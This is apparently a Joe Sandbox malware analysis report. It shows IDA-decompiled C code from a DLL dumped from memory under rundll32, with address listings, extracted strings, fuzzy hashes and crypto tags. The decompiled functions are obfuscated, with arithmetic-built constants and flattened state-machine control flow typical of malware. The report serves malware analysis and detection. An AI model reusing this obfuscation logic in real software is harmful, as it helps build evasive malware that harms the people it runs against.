				_v28 = _v28 ^ 0x0000629f;
				_v36 = 0xa6d4;
				_v36 = _v36 + 0xffffc65c;
				_v36 = _v36 ^ 0x00006d44;
				_v72 = 0x4693;
				_v72 = _v72 | 0x8261f221;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x0104c1d4;
				_v104 = 0x1547;
				_v104 = _v104 >> 9;
				_v104 = _v104 * 0x6e;
				_v104 = _v104 ^ 0x0000044d;
				_v148 = 0xcfb0;
				_v148 = _v148 >> 6;
				_v148 = _v148 | 0xbecf16fe;
				_v148 = _v148 ^ 0xbecf17ff;
				_v64 = 0x449d;
				_v64 = _v64 << 0xd;
				_v64 = _v64 * 0x30;
				_v64 = _v64 ^ 0x9bae0001;
				_t430 = _v12;
				while(1) {
					L1:
					_t364 = _v128;
					while(1) {
						_t422 = 0x1994d475;
						while(1) {
							L3:
							_t443 = _t433 - _t422;
							if(_t443 > 0) {
								goto L20;
							}
							L4:
							if(_t443 == 0) {
								E10015963(_a16, _v148, _t438, _v92, _v68);
								_t440 =  &(_t440[3]);
								goto L19;
							} else {
								if(_t433 == 0x18ba6df) {
									_t430 = _t430 + 0x2c;
									asm("sbb esi, esi");
									_t433 = (_t433 & 0x01739b49) + 0x4550e01;
									continue;
								} else {
									if(_t433 == 0x2f8e7bf) {
										_t377 = E10012249(_a12, _v40, _t395, _t395, _v140, _v84, _v156, _v108, _t386, _t395, _t395, _v24, _t395,  &_v12, _t395,  &_v8);
										_t440 =  &(_t440[0xe]);
										if(_t377 == 0) {
											L19:
											_t433 = 0x4550e01;
											goto L13;
										} else {
											_t380 = E10017B6B();
											_t433 = 0x5c8a94a;
											_t364 = _v12 * 0x2c + _t386;
											_v128 = _t364;
											_t430 =  >=  ? _t386 : (_t380 & 0x0000001f) * 0x2c + _t386;
											goto L14;
										}
										L33:
										return _t364;
									} else {
										if(_t433 == 0x4550e01) {
											_t296 =  &_v48; // 0x6d44
											E100091CD( *_t296, _v132, _v76, _t438, _v164);
											_t440 =  &(_t440[3]);
											_t433 = 0x2fd49dd4;
											L13:
											_t364 = _v128;
											L14:
											_t395 = _v136;
											_t422 = 0x1994d475;
											continue;
										} else {
											if(_t433 == 0x5c8a94a) {
												_t395 = E10017C1D(_v20, _v60, _a12,  *_t430, _v64, _v112);
												_t440 =  &(_t440[4]);
												_v136 = _t395;
												_t433 =  !=  ? 0x2d7fc8f5 : 0x18ba6df;
												goto L1;
											} else {
												if(_t433 == 0x16bff9b6) {
													_t433 = 0x1a134602;
													while(1) {
														L3:
														_t443 = _t433 - _t422;
														if(_t443 > 0) {
															goto L20;
														}
														goto L4;
													}
													goto L20;
												}
											}
										}
									}
								}
							}
							L30:
							if(_t433 != 0x399cbc9a) {
								_t364 = _v128;
								_t395 = _v136;
								continue;
							}
							goto L33;
							L20:
							if(_t433 == 0x1a134602) {
								_push(_t395);
								_t364 = E100157E8(0x20000);
								_t386 = _t364;
								if(_t386 == 0) {
									_t433 = 0x399cbc9a;
									goto L29;
								} else {
									_t433 = 0x34bb9491;
									goto L13;
								}
							} else {
								_t364 = 0x2d7fc8f5;
								if(_t433 == 0x2d7fc8f5) {
									E1001ECE3( &_v4, _v96, _v104, _v152, _t438, _v124, _t395, _t395, _v116, _v32);
									_t433 =  !=  ? 0x1994d475 : 0x18ba6df;
									_t364 = E1001F23C(_v88, _v136, _v52, _v144, _v56);
									_t440 =  &(_t440[0xb]);
									L29:
									_t422 = 0x1994d475;
								} else {
									if(_t433 == 0x2fd49dd4) {
										return E100091CD(_v120, _v28, _v36, _t386, _v72);
									}
									if(_t433 == 0x34bb9491) {
										_push(_t395);
										_t438 = E100157E8(0x2000);
										_t433 =  !=  ? 0x2f8e7bf : 0x2fd49dd4;
										goto L13;
									}
								}
							}
							goto L30;
						}
					}
				}
			}

0x10006214
0x1000621b
0x10006222
0x10006229
0x10006230
0x10006231
0x10006232
0x10006237
0x10006242
0x1000624b
0x1000624d
0x10006252
0x10006256
0x1000625b
0x10006261
0x10006269
0x10006271
0x1000627c
0x10006283
0x1000628e
0x10006296
0x1000629b
0x100062a0
0x100062a5
0x100062ad
0x100062b5
0x100062bd
0x100062c2
0x100062ca
0x100062d2
0x100062e4
0x100062e9
0x100062f2
0x100062fd
0x10006305
0x1000630d
0x10006316
0x1000631b
0x10006321
0x10006329
0x10006331
0x10006339
0x10006341
0x10006349
0x10006351
0x10006359
0x10006361
0x10006369
0x10006371
0x10006379
0x1000637e
0x10006386
0x1000638e
0x100063a1
0x100063a2
0x100063a9
0x100063b4
0x100063c1
0x100063cb
0x100063cf
0x100063d9
0x100063e4
0x100063ef
0x100063fa
0x10006405
0x10006410
0x1000641b
0x1000642a
0x1000642d
0x10006434
0x1000643f
0x10006447
0x10006457
0x1000645b
0x10006463
0x1000646b
0x10006473
0x1000647b
0x10006483
0x1000648b
0x10006493
0x100064a0
0x100064a1
0x100064a5
0x100064ad
0x100064b5
0x100064ba
0x100064c2
0x100064ca
0x100064d2
0x100064df
0x100064e3
0x100064eb
0x100064f6
0x10006501
0x1000650c
0x10006514
0x10006521
0x10006525
0x1000652d
0x10006538
0x10006543
0x1000654e
0x10006556
0x1000655e
0x10006566
0x1000656b
0x10006573
0x1000657e
0x10006586
0x10006591
0x10006599
0x100065a1
0x100065a9
0x100065b1
0x100065be
0x100065c2
0x100065ca
0x100065d2
0x100065e6
0x100065ed
0x100065f8
0x10006600
0x10006608
0x10006610
0x10006618
0x10006620
0x10006628
0x10006632
0x1000663a
0x10006642
0x1000664a
0x10006652
0x10006661
0x10006662
0x10006666
0x1000666e
0x10006676
0x1000667e
0x10006686
0x1000668e
0x100066a2
0x100066a6
0x100066ad
0x100066b8
0x100066c3
0x100066ce
0x100066d9
0x100066e1
0x100066e9
0x100066ee
0x100066f6
0x100066fe
0x10006708
0x1000670c
0x10006714
0x1000671c
0x10006721
0x10006729
0x10006731
0x10006739
0x10006743
0x10006747
0x1000674f
0x10006756
0x10006756
0x10006756
0x1000675a
0x1000675a
0x1000675f
0x1000675f
0x1000675f
0x10006761
0x00000000
0x00000000
0x10006767
0x10006767
0x100068c3
0x100068c8
0x00000000
0x1000676d
0x10006773
0x10006897
0x1000689c
0x100068a4
0x00000000
0x10006779
0x1000677f
0x10006856
0x1000685b
0x10006860
0x100068cb
0x100068cb
0x00000000
0x10006862
0x1000686d
0x10006875
0x10006887
0x1000688b
0x1000688f
0x00000000
0x1000688f
0x100069fb
0x100069fb
0x10006785
0x1000678b
0x100067f6
0x100067fd
0x10006802
0x10006805
0x1000680a
0x1000680a
0x1000680e
0x1000680e
0x1000675a
0x00000000
0x1000678d
0x10006793
0x100067cc
0x100067ce
0x100067d3
0x100067e1
0x00000000
0x10006795
0x1000679b
0x100067a1
0x1000675f
0x1000675f
0x1000675f
0x10006761
0x00000000
0x00000000
0x00000000
0x10006761
0x00000000
0x1000675f
0x1000679b
0x10006793
0x1000678b
0x1000677f
0x10006773
0x100069bd
0x100069c3
0x100069c5
0x100069c9
0x00000000
0x100069c9
0x00000000
0x100068d5
0x100068db
0x10006997
0x1000699d
0x100069a2
0x100069a7
0x100069b3
0x00000000
0x100069a9
0x100069a9
0x00000000
0x100069a9
0x100068e1
0x100068e1
0x100068e8
0x10006951
0x1000697f
0x10006982
0x10006987
0x100069b8
0x100069b8
0x100068ea
0x100068f0
0x00000000
0x100069ee
0x100068fc
0x1000690a
0x10006915
0x10006924
0x00000000
0x10006924
0x100068fc
0x100068e8
0x00000000
0x100068db
0x1000675f
0x1000675a

Strings

#, xrefs: 10006351
q$, xrefs: 10006599
Dmw, xrefs: 100067F6
RESCDIR, xrefs: 10006998
6B, xrefs: 10006371
F, xrefs: 1000667E
rYym, xrefs: 100062CA
?J, xrefs: 1000648B

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$6B$?J$Dmw$RESCDIR$q$$rYym$F
API String ID: 0-1064706702
Opcode ID: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
Instruction ID: 12a8db86310814296b6cd3691f3c08f104cbabb9bff823363e51c79446ee3229
Opcode Fuzzy Hash: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
Instruction Fuzzy Hash: 531235729083809FE368CF24C985A4FBBE2FBC5754F108A1DE5D9962A0D7B59908CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10002DEE, Relevance: 10.3, Strings: 8, Instructions: 299
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10002DEE(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				unsigned int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				intOrPtr _t312;
				intOrPtr _t315;
				signed int _t317;
				signed int _t328;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				void* _t340;
				signed int _t376;
				void* _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int* _t385;

				_t385 =  &_v1676;
				_v1652 = 0xab2a;
				_v1652 = _v1652 + 0xffff495e;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 * 0x69;
				_t384 = __edx;
				_v1652 = _v1652 ^ 0xfed2f229;
				_v1584 = 0x9d53;
				_t328 = __ecx;
				_v1584 = _v1584 + 0xa330;
				_t377 = 0xee39a7c;
				_v1584 = _v1584 ^ 0x000172e7;
				_v1592 = 0xcdb9;
				_t330 = 0x11;
				_v1592 = _v1592 * 0x36;
				_v1592 = _v1592 ^ 0x002b5ef0;
				_v1576 = 0x10e6;
				_v1576 = _v1576 ^ 0xbdc8c8ad;
				_v1576 = _v1576 ^ 0xbdc8e062;
				_v1616 = 0x2d0;
				_v1616 = _v1616 << 2;
				_v1616 = _v1616 >> 4;
				_v1616 = _v1616 ^ 0x00001000;
				_v1564 = 0x56a7;
				_v1564 = _v1564 / _t330;
				_v1564 = _v1564 ^ 0x000075e6;
				_v1668 = 0x8a0a;
				_v1668 = _v1668 ^ 0xf9b8a5a3;
				_v1668 = _v1668 >> 4;
				_v1668 = _v1668 << 8;
				_v1668 = _v1668 ^ 0x9b82d072;
				_v1608 = 0x1b3c;
				_v1608 = _v1608 << 3;
				_t331 = 0x19;
				_v1608 = _v1608 * 0x7b;
				_v1608 = _v1608 ^ 0x006884bb;
				_v1660 = 0x34f3;
				_v1660 = _v1660 ^ 0x817c71db;
				_v1660 = _v1660 << 0xc;
				_v1660 = _v1660 + 0xee26;
				_v1660 = _v1660 ^ 0xc4532971;
				_v1636 = 0xf8a9;
				_v1636 = _v1636 | 0xff2fbebc;
				_v1636 = _v1636 * 9;
				_v1636 = _v1636 ^ 0xf8afb852;
				_v1620 = 0xbdfe;
				_v1620 = _v1620 / _t331;
				_v1620 = _v1620 + 0xcd35;
				_v1620 = _v1620 ^ 0x0000b0b7;
				_v1612 = 0xc643;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 + 0xffff2544;
				_v1612 = _v1612 ^ 0xffff1dfd;
				_v1596 = 0xa7ff;
				_v1596 = _v1596 + 0xffffdda0;
				_v1596 = _v1596 ^ 0x0000ce4c;
				_v1588 = 0x97f4;
				_v1588 = _v1588 >> 0xb;
				_v1588 = _v1588 ^ 0x00000d4c;
				_v1624 = 0xc45e;
				_t332 = 0x3c;
				_v1624 = _v1624 / _t332;
				_v1624 = _v1624 ^ 0xe4d01b6a;
				_v1624 = _v1624 ^ 0xe4d071e7;
				_v1628 = 0x92d6;
				_v1628 = _v1628 >> 2;
				_v1628 = _v1628 | 0xb4e3a315;
				_v1628 = _v1628 ^ 0xb4e38f21;
				_v1676 = 0x6ce6;
				_t333 = 0x62;
				_v1676 = _v1676 / _t333;
				_t334 = 0x5b;
				_v1676 = _v1676 * 0xb;
				_v1676 = _v1676 + 0xffffdd0c;
				_v1676 = _v1676 ^ 0xffff8d43;
				_v1568 = 0x788f;
				_v1568 = _v1568 | 0x01d52ab2;
				_v1568 = _v1568 ^ 0x01d55070;
				_v1580 = 0xac01;
				_v1580 = _v1580 | 0x939dc85b;
				_v1580 = _v1580 ^ 0x939d96e7;
				_v1644 = 0x4f10;
				_v1644 = _v1644 * 0x6c;
				_v1644 = _v1644 | 0x48f07e2e;
				_v1644 = _v1644 >> 9;
				_v1644 = _v1644 ^ 0x00245a10;
				_v1656 = 0xfccd;
				_v1656 = _v1656 ^ 0x0dc9b737;
				_v1656 = _v1656 << 8;
				_v1656 = _v1656 | 0x5beff8b5;
				_v1656 = _v1656 ^ 0xdbefe6c8;
				_v1572 = 0x60e1;
				_v1572 = _v1572 / _t334;
				_v1572 = _v1572 ^ 0x000055cd;
				_v1604 = 0x4c8;
				_t335 = 0x33;
				_v1604 = _v1604 / _t335;
				_v1604 = _v1604 ^ 0x56d62181;
				_v1604 = _v1604 ^ 0x56d60377;
				_v1664 = 0xeba7;
				_t336 = 0x75;
				_v1664 = _v1664 / _t336;
				_v1664 = _v1664 + 0x2263;
				_t337 = 0x6a;
				_v1664 = _v1664 / _t337;
				_v1664 = _v1664 ^ 0x00006206;
				_v1672 = 0xe4de;
				_v1672 = _v1672 * 6;
				_v1672 = _v1672 ^ 0xd03d2876;
				_v1672 = _v1672 ^ 0x484383cd;
				_v1672 = _v1672 ^ 0x987bff54;
				_v1632 = 0x7003;
				_v1632 = _v1632 >> 0xf;
				_v1632 = _v1632 ^ 0x6ec815ff;
				_v1632 = _v1632 + 0xffffbce8;
				_v1632 = _v1632 ^ 0x6ec7acef;
				_v1640 = 0x9135;
				_v1640 = _v1640 ^ 0x0aba72c7;
				_v1640 = _v1640 | 0xda9e3ffa;
				_t338 = 7;
				_v1640 = _v1640 / _t338;
				_v1640 = _v1640 ^ 0x1f3ffeda;
				_v1648 = 0xbacf;
				_v1648 = _v1648 >> 0xd;
				_t339 = 0x17;
				_v1648 = _v1648 / _t339;
				_v1648 = _v1648 << 0xc;
				_v1648 = _v1648 ^ 0x0000584d;
				_v1600 = 0xeac1;
				_v1600 = _v1600 * 0x77;
				_v1600 = _v1600 ^ 0x006d5ca6;
				_t376 = _v1600;
				while(_t377 != 0x5fcbc3f) {
					if(_t377 != 0xee39a7c) {
						if(_t377 == 0x11ea9c68) {
							_push( &_v520);
							_t317 = E10002628(_t328, _t384);
							asm("sbb esi, esi");
							_t339 = 0x100012f8;
							_t380 =  ~_t317 & 0x1fda4e6f;
							goto L7;
						} else {
							if(_t377 == 0x1790ebe1) {
								return E100091CD(_v1632, _v1640, _v1648, _t376, _v1600);
							}
							_t394 = _t377 - 0x376b3a50;
							if(_t377 != 0x376b3a50) {
								L12:
								__eflags = _t377 - 0x7fc7711;
								if(_t377 != 0x7fc7711) {
									continue;
								} else {
									return _t317;
								}
								L16:
							} else {
								_push(_t339);
								E10001D54(_v1576, _t339, _v1616, _v1564, _v1668,  &_v1560, _v1608, _v1652);
								_push(0x10001368);
								_push(_v1620);
								E100163BF(E1001BF25(_v1660, _v1636, _t394), _t394, _v1596, _v1588,  &_v1040, _v1660, _v1624,  &_v1560,  &_v520, _v1628);
								E1001C5F7(_v1676, _v1568, _v1580, _v1644, _t321);
								_push(_v1672);
								_push(0);
								_push( &_v1040);
								_push(0);
								_push(_v1664);
								_push(_v1604);
								_push(0);
								_push(0);
								_t339 = _v1656;
								_t317 = E100189F6(_t339, _v1572, _t394);
								_t385 =  &(_t385[0x1d]);
								asm("sbb esi, esi");
								_t380 =  ~_t317 & 0xee6bd05e;
								L7:
								_t377 = _t380 + 0x1790ebe1;
								continue;
							}
						}
					}
					_t340 = 0x24;
					_t315 = E100157E8(_t340);
					_t376 = _t315;
					_t339 = _t339;
					__eflags = _t376;
					if(_t376 != 0) {
						_t377 = 0x11ea9c68;
						continue;
					}
					return _t315;
					goto L16;
				}
				 *((intOrPtr*)(_t376 + 0x20)) = _t328;
				_t377 = 0x7fc7711;
				_t312 =  *0x10021400; // 0x0
				 *((intOrPtr*)(_t376 + 0x10)) = _t312;
				 *0x10021400 = _t376;
				goto L12;
			}

0x10002dee
0x10002df4
0x10002dfc
0x10002e04
0x10002e12
0x10002e16
0x10002e18
0x10002e22
0x10002e2a
0x10002e2c
0x10002e34
0x10002e39
0x10002e41
0x10002e50
0x10002e53
0x10002e57
0x10002e5f
0x10002e67
0x10002e6f
0x10002e77
0x10002e7f
0x10002e84
0x10002e89
0x10002e91
0x10002ea7
0x10002eae
0x10002eb9
0x10002ec1
0x10002ec9
0x10002ece
0x10002ed3
0x10002edb
0x10002ee3
0x10002eed
0x10002ef0
0x10002ef4
0x10002efc
0x10002f04
0x10002f0c
0x10002f11
0x10002f19
0x10002f21
0x10002f29
0x10002f36
0x10002f3a
0x10002f42
0x10002f52
0x10002f56
0x10002f5e
0x10002f66
0x10002f6e
0x10002f73
0x10002f7b
0x10002f83
0x10002f8b
0x10002f93
0x10002f9b
0x10002fa3
0x10002fa8
0x10002fb0
0x10002fbc
0x10002fbf
0x10002fc3
0x10002fcd
0x10002fd5
0x10002fdd
0x10002fe2
0x10002fea
0x10002ff2
0x10003000
0x10003005
0x10003010
0x10003013
0x10003017
0x1000301f
0x10003027
0x10003032
0x1000303d
0x10003048
0x10003050
0x10003058
0x10003060
0x1000306d
0x10003071
0x10003079
0x1000307e
0x10003086
0x1000308e
0x10003096
0x1000309b
0x100030a3
0x100030ab
0x100030bb
0x100030bf
0x100030c7
0x100030d3
0x100030d8
0x100030de
0x100030e6
0x100030ee
0x100030fa
0x100030ff
0x10003105
0x10003111
0x10003114
0x10003118
0x10003120
0x1000312d
0x10003131
0x10003139
0x10003141
0x10003149
0x10003151
0x10003156
0x1000315e
0x10003166
0x1000316e
0x10003176
0x1000317e
0x1000318e
0x10003193
0x10003199
0x100031a1
0x100031a9
0x100031b2
0x100031b5
0x100031b9
0x100031be
0x100031c6
0x100031d3
0x100031d7
0x100031df
0x100031e3
0x100031f5
0x10003201
0x1000330a
0x10003312
0x1000331c
0x1000331e
0x1000331f
0x00000000
0x10003207
0x1000320d
0x00000000
0x10003383
0x10003213
0x10003219
0x1000335f
0x1000335f
0x10003365
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000321f
0x1000321f
0x10003247
0x1000324c
0x10003251
0x10003299
0x100032b5
0x100032c6
0x100032ca
0x100032cb
0x100032cc
0x100032cd
0x100032d1
0x100032dc
0x100032dd
0x100032de
0x100032e2
0x100032e7
0x100032ee
0x100032f0
0x100032f6
0x100032f6
0x00000000
0x100032f6
0x10003219
0x10003201
0x10003332
0x10003333
0x10003338
0x1000333a
0x1000333b
0x1000333d
0x1000333f
0x00000000
0x1000333f
0x10003390
0x00000000
0x10003390
0x10003349
0x1000334c
0x10003351
0x10003356
0x10003359
0x00000000

Strings

&, xrefs: 10002F11
P:k7, xrefs: 10003213
L, xrefs: 10002FA8
u, xrefs: 10002EAE
`, xrefs: 100030AB
l, xrefs: 10002FF2
c", xrefs: 10003105
MX, xrefs: 100031BE

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &$L$MX$P:k7$c"$`$l$u
API String ID: 0-1688440420
Opcode ID: c57c8c132fb062cf0c2aaeef19711f7a283d97605f9d3aa3c5ec5f660990e958
Instruction ID: 244f6f35476485b824b653b9f0eb5f1c04093fde2945297bf2edbc57fc600e94
Opcode Fuzzy Hash: c57c8c132fb062cf0c2aaeef19711f7a283d97605f9d3aa3c5ec5f660990e958
Instruction Fuzzy Hash: 4CE131725083409FE368CF25C98A94BFBF1FBC4748F10891DF5A58A260D7B69909CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10001658, Relevance: 10.3, Strings: 8, Instructions: 285
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10001658(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t280;
				intOrPtr* _t282;
				intOrPtr* _t283;
				intOrPtr* _t284;
				intOrPtr* _t290;
				intOrPtr _t291;
				intOrPtr _t292;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				void* _t313;
				intOrPtr* _t337;
				void* _t338;
				void* _t341;
				signed int* _t342;

				_t342 =  &_v112;
				_v76 = 0x33fd;
				_v76 = _v76 + 0xc49f;
				_v76 = _v76 * 0x29;
				_t341 = __edx;
				_v76 = _v76 ^ 0x0027ed19;
				_v32 = 0xcc47;
				_t292 = __ecx;
				_t337 = 0;
				_t294 = 0x55;
				_v32 = _v32 / _t294;
				_v32 = _v32 ^ 0x00006db6;
				_t338 = 0x2fa674f5;
				_v72 = 0x6a0a;
				_v72 = _v72 + 0xffff61af;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x0000c658;
				_v28 = 0xdc12;
				_v28 = _v28 + 0xffffa614;
				_v28 = _v28 ^ 0x0000bab7;
				_v64 = 0x618;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 ^ 0xcf790140;
				_v64 = _v64 ^ 0xcf796a5a;
				_v108 = 0x7f72;
				_t295 = 0xe;
				_v108 = _v108 * 0x4b;
				_v108 = _v108 | 0xd60feb69;
				_v108 = _v108 ^ 0xd62f8cb3;
				_v112 = 0x24c;
				_v112 = _v112 / _t295;
				_v112 = _v112 | 0xf1ea6f15;
				_v112 = _v112 * 5;
				_v112 = _v112 ^ 0xb9941bfd;
				_v68 = 0xf170;
				_v68 = _v68 | 0xaf46648c;
				_v68 = _v68 ^ 0xc1ce5702;
				_v68 = _v68 ^ 0x6e88e0f6;
				_v20 = 0xb551;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x001a3386;
				_v24 = 0x298e;
				_v24 = _v24 * 0x76;
				_v24 = _v24 ^ 0x001331c5;
				_v60 = 0x8d97;
				_v60 = _v60 >> 2;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x0000628a;
				_v104 = 0x3b43;
				_v104 = _v104 >> 0xb;
				_v104 = _v104 + 0x60ed;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0x060f18e7;
				_v56 = 0x22a0;
				_v56 = _v56 << 0xa;
				_v56 = _v56 | 0xb5955f6a;
				_v56 = _v56 ^ 0xb59ff508;
				_v96 = 0xc755;
				_v96 = _v96 + 0xffff502d;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x00007dd0;
				_v100 = 0xa33d;
				_t296 = 0x22;
				_v100 = _v100 / _t296;
				_t297 = 0x28;
				_v100 = _v100 * 0x21;
				_v100 = _v100 | 0xc89f00a3;
				_v100 = _v100 ^ 0xc89f9ef6;
				_v16 = 0x20c7;
				_v16 = _v16 + 0xecf3;
				_v16 = _v16 ^ 0x00014c0a;
				_v40 = 0x76db;
				_v40 = _v40 >> 9;
				_v40 = _v40 + 0x6d1d;
				_v40 = _v40 ^ 0x000061d8;
				_v44 = 0x71d;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 + 0xff5b;
				_v44 = _v44 ^ 0x0000e72e;
				_v48 = 0x8b38;
				_v48 = _v48 ^ 0xf66aca43;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x905ecaad;
				_v12 = 0xfda7;
				_v12 = _v12 ^ 0xcb86e1f3;
				_v12 = _v12 ^ 0xcb86358a;
				_v52 = 0x79a1;
				_v52 = _v52 | 0x05e61714;
				_v52 = _v52 * 0x59;
				_v52 = _v52 ^ 0x0d220a4b;
				_v92 = 0x6d1;
				_v92 = _v92 ^ 0xaab1ecb0;
				_v92 = _v92 ^ 0x7a5f7ff4;
				_v92 = _v92 | 0x9dbc7c28;
				_v92 = _v92 ^ 0xddfeba29;
				_v4 = 0xb969;
				_v4 = _v4 + 0xffff29a6;
				_v4 = _v4 ^ 0xffffac55;
				_v8 = 0x80c1;
				_v8 = _v8 / _t297;
				_v8 = _v8 ^ 0x00007b2b;
				_v80 = 0x88c7;
				_t298 = 0x72;
				_v80 = _v80 * 0x11;
				_v80 = _v80 | 0x43e442c5;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x087de60e;
				_v84 = 0xaa5;
				_v84 = _v84 * 0x44;
				_v84 = _v84 / _t298;
				_t299 = 0x68;
				_v84 = _v84 / _t299;
				_v84 = _v84 ^ 0x00006b9b;
				_v88 = 0x4374;
				_v88 = _v88 >> 1;
				_v88 = _v88 + 0x8882;
				_t300 = 0x1f;
				_v88 = _v88 / _t300;
				_v88 = _v88 ^ 0x00003aab;
				_v36 = 0xe64;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 ^ 0x5e386e4c;
				_v36 = _v36 ^ 0x5e3850f6;
				while(1) {
					L1:
					_t280 = 0x220f80b2;
					while(1) {
						L2:
						_t301 = 0x34935044;
						do {
							L3:
							while(_t338 != 0x12347269) {
								if(_t338 == _t280) {
									_t282 = E1000D6D8(_v40, _v44, _t301, E1000213E, _v48, _t301, _t337, _t301, _t301, _v12, _v52);
									_t342 =  &(_t342[9]);
									 *((intOrPtr*)(_t337 + 4)) = _t282;
									__eflags = _t282;
									_t301 = 0x34935044;
									_t280 = 0x220f80b2;
									_t338 =  !=  ? 0x34935044 : 0x12347269;
									continue;
								}
								if(_t338 == 0x269b78c0) {
									_t283 = E10008997(_v56, _v96, _v100, _v16,  *_t337);
									_t342 =  &(_t342[3]);
									 *((intOrPtr*)(_t337 + 0x1c)) = _t283;
									__eflags = _t283;
									_t280 = 0x220f80b2;
									_t338 =  !=  ? 0x220f80b2 : 0x12347269;
									L2:
									_t301 = 0x34935044;
									continue;
								}
								if(_t338 == 0x29978df7) {
									_push(_v28);
									_t284 = E10005BE1(_v72, _t341, __eflags, _t301);
									 *_t337 = _t284;
									__eflags = _t284;
									if(__eflags == 0) {
										_t338 = 0x2b89b2cd;
									} else {
										E100039D1(_v108, _v112,  *_t337, _v68, _t284);
										E100056B3(_v24, _v60,  *_t337, _v104);
										_t342 =  &(_t342[7]);
										_t338 = 0x269b78c0;
									}
									while(1) {
										L1:
										_t280 = 0x220f80b2;
										goto L2;
									}
								}
								if(_t338 == 0x2b89b2cd) {
									return E100091CD(_v80, _v84, _v88, _t337, _v36);
								}
								if(_t338 == 0x2fa674f5) {
									_push(_t301);
									_t313 = 0x24;
									_t290 = E100157E8(_t313);
									_t337 = _t290;
									__eflags = _t337;
									if(__eflags == 0) {
										return _t290;
									}
									_t338 = 0x29978df7;
									goto L1;
								}
								if(_t338 != _t301) {
									goto L19;
								}
								 *((intOrPtr*)(_t337 + 0x20)) = _t292;
								_t291 =  *0x10021400; // 0x0
								 *((intOrPtr*)(_t337 + 0x10)) = _t291;
								 *0x10021400 = _t337;
								return _t291;
							}
							E10018C8B(_v92, _v4, _v8,  *_t337);
							_t338 = 0x2b89b2cd;
							_t280 = 0x220f80b2;
							_t301 = 0x34935044;
							L19:
							__eflags = _t338 - 0x92c1d44;
						} while (__eflags != 0);
						return _t280;
					}
				}
			}

0x10001658
0x1000165b
0x10001663
0x10001674
0x10001678
0x1000167a
0x10001684
0x1000168c
0x10001692
0x10001696
0x1000169b
0x100016a1
0x100016a9
0x100016ae
0x100016b6
0x100016be
0x100016c3
0x100016cb
0x100016d3
0x100016db
0x100016e3
0x100016eb
0x100016f0
0x100016f8
0x10001700
0x1000170d
0x1000170e
0x10001712
0x1000171a
0x10001722
0x10001730
0x10001734
0x10001741
0x10001745
0x1000174d
0x10001755
0x1000175d
0x10001765
0x1000176d
0x1000177a
0x1000177e
0x10001786
0x10001793
0x10001797
0x1000179f
0x100017a7
0x100017ac
0x100017b1
0x100017b9
0x100017c1
0x100017c6
0x100017ce
0x100017d3
0x100017db
0x100017e3
0x100017e8
0x100017f0
0x100017f8
0x10001800
0x10001808
0x1000180d
0x10001812
0x1000181c
0x1000182a
0x1000182f
0x1000183a
0x1000183d
0x10001841
0x10001849
0x10001851
0x10001859
0x10001861
0x10001869
0x10001871
0x10001876
0x1000187e
0x10001886
0x1000188e
0x10001893
0x1000189b
0x100018a3
0x100018ab
0x100018b3
0x100018b8
0x100018c0
0x100018c8
0x100018d0
